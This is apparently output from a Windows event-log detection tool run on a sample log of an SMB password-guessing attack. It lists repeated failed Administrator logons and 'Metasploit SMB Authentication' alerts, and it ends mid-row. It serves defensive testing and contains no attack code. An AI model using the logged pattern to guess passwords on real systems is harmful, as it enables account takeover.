SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: 
